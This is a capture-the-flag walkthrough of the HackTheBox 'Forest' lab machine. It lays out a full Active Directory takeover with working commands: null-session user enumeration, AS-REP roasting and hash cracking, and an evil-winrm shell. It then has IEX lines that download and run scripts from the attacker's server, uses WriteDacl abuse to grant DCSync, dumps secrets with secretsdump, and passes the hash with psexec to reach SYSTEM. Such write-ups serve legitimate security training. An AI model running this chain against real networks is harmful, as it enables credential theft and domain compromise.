HackTheBox — Forest Walkthrough

Forest

Info Card

Summary

This is a write-up for an easy Windows box on hackthebox.eu named Forest. It was a unique box in the sense that there was no web application as an attack surface. We had to exploit a null session to get a hash of a user, which we then use on the box to get a shell. From that shell, we run Bloodhound to get a path to escalate our user account privilege and then use that account to dump secrets, using those secrets we login to the box as administrator.

Recon

As usual, we will start with nmap (the IP might be different for you)

ports=$(nmap -p- --min-rate=1000 -T4 10.129.1.77 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.129.1.77

Looking at the results we can see there are multiple ports open

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-31 11:27 EDT
Nmap scan report for 10.129.1.77
Host is up (0.21s latency).
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-31 15:36:34Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  msrpc        Microsoft Windows RPC
49677/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49682/tcp open  msrpc        Microsoft Windows RPC
49694/tcp open  msrpc        Microsoft Windows RPC
49748/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/31%Time=5F9D8276%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h28m49s, deviation: 4h02m30s, median: 8m48s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-10-31T08:38:59-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-10-31T15:38:58
|_  start_date: 2020-10-31T15:20:47
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 287.87 seconds

We will start with SMB. We will run smbclient and try to list shares

smbclient -L 10.129.1.77

We can see that the anonymous login was successful but no shares were listed.

smbclient output

We will move on to rpcclient and check if we can enumerate some users on the box. We will try to authenticate via null authentication

Funny thing, null authentication helps to enumerate domains as well as users when in use, it was a functionality in Windows Server 2003 and 2008. On later versions it got removed when doing a fresh installation. On upgrading from previous versions of Windows Server the functionality doesn’t get disable as users mught be using this functionality.

rpcclient -U '' 10.129.1.77

And we get a session

rpcclient output

Let’s enumerate users

enumdomusers

userlist gathered via rpcclient

We can see there are a few users which can be useful

Administrator
sebastien
lucinda
svc-alfresco
andy
mark
santi

You can observe that we did remove a chunk portion of the users, mostly because those are default account or maybe created by programs, so if we were to perform a bruteforce on the box it wouldn't have been possible using these accounts.

Among the users svc-alfresco looks like a service account, we are guessing that from the naming convention of the account. We can confirm this on rpcclient by running the following queries.

queryusergroups 0x47b
querygroup 0x47c
querygroup 0x201

checking user groups fro svc-alfresco

As we move on we don't have anything solid on the box so we will use impacket tools. We will be using GetNPUsers.py. What this does is it gets all the users that don't require a Keberos pre-authentication and we can extract their TGTs.

We copy the script to our working directory and run the command

python3 GetNPUsers.py -dc-ip 10.129.1.77 -request 'htb.local/' -format hashcat

And we get a user account dumped. We specify the format as hashcat so that we can use the dump in hashcat.

GetNPUsers.py output

Now, as we have a user and its hash let’s see if we can crack the hash and get into the box.

Initial Foothold

Let’s run hashcat

hashcat -m 18200 forest-hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule

And looking at the results we can see that we have cracked the password and it is ‘s3rvice’

hashcat output

We have already seen in the nmap output that port 5985 is open. We can try to connect via winrm and try to get a shell. We will be using evil-winrm to connect.

evil-winrm -i 10.129.1.77 -u svc-alfresco -p s3rvice

And we get a shell

initial shell

Enumeration

We have a lower privilege service account on the system, we need to escalate our privilege.

We will start with BloodHound. To do this we will host an HTTP server to load our ShardHound script on the victim's machine, create a smb share so that we can extract output from BloodHound to our local machine.

Let’s start with starting the python HTTP webserver

sudo python3 -m http.server 80

Let’s create the smbshare, on our local machine. We will be using impacket-smbserver

sudo impacket-smbserver tmp $(pwd) -smb2support -user miku -password password

Now, we have to create a new PSDrive to connect to the share for that we need to put the password in a credential object. We run the following commands on the shell

$pass = convertto-securestring 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('miku', $pass)

Now to connect,

New-PSDrive -Name miku -PSProvider FileSystem -Credential $cred -Root \\10.10.14.41\tmp

From the output we can confirm our PSDrive was created.

PSDrive Created

Let’s load script on the victim’s machine and run it.

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.41/SharpHound.ps1')
Invoke-BloodHound -CollectAll

After BloodHound finishes we will have a zip file containing the results. We will copy this file to the PSDrive.

cd miku:
xcopy 'C:\Users\svc-alfresco\Documents\20201031104759_BloodHound.zip' .

We need to run BloodHound now and check for paths to escalate our privilege.

First we will start our neo4j console and then start BloodHound.

First Console

neo4j console

Second Console,

bloodhound

starting BloodHound

We now put the zipfile in the bloodhound window and it should be analyzed in a while.

Once the zip file gets analyzed, let’s find out user and mark it as owned

marking svc-alfresco as owned

Looking for the paths, we start from Shortest Path on the Owned Principal. It shows that svc-alfresco is a member of Service Accounts, Service Accounts is a member of Privileged IT Accounts, which is a member of Account Operators. Account Operators is a member of Exchage Windows Permissions. Exchange Windows Permissions has WriteDacl permission on HTB.LOCAL.

BloodHound Path

The Account Operators group grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers.

Members of the Account Operators group cannot manage the Administrator user account, the user accounts of administrators, or the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Members of this group cannot modify user rights.

Privilege Escalation

We can abuse WriteDacl on the domain object to grant us DCSync rights on HTB.LOCAL.

To abuse this we will create a new user first, in order to keep the current account safe, if we ever need it. To create a user

net user miku miku@123 /add /domain

Now, we will make add it to the group of Exchange Windows Permissions

net group "Exchange Windows Permissions" /add miku

Now, with the help of PowerView we will abuse the WriteDacl, PowerView is a part of PowerSploit. We can download it from github. Otherwise we can just copy the PowerView.ps1 script to our web server directory and again load the script on the remote shell. To load the script on the shell we will run

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.41/PowerView.ps1')

We will again create a credential object for our password and credential. This time for the user we created

$pass = convertto-securestring 'miku@123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('HTB\miku', $pass)

Now, we run the following command to grant us DCSync rights on our account

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity miku -Rights DCSync

getting DCSync rights

After we have the rights we will dump the secrets from the machine and use the secrets to login as administrator.

To dump the secrets we will use another impacket tool secretsdump.py. If this runs successfully that means our rights were assigned successfully and secrets will get dumped.

python3 secretsdump.py htb.local/miku:miku@123@10.129.1.77

Looking at the output we have a quite a lot of secrets dumped.

secrets dumped

Now, we will use crackmapexec to check if our password works or not. To do that run

crackmapexec smb 10.129.1.77 -u administrator -H aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

And we can see that it shows Pwn3d!, this means we can get a shell from the account.

crackmapexec output

We will use another impacket tool psexec to connect to the machine.

python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.129.1.77

Voila! We get a shell back, running “whoami” we get that we have the shell as “nt authority\system”.

nt authority\system

Flags

type root.txt
f048153f202bbb2f82622b04d...9cc
type C:\Users\svc-alfresco\Desktop\user.txt
e5e4e47ae7022664cda6eb013...9ed

Trophy

Hope you liked this write-up on Forest from hackthebox. Comments and Claps are appreciated.

~m1kU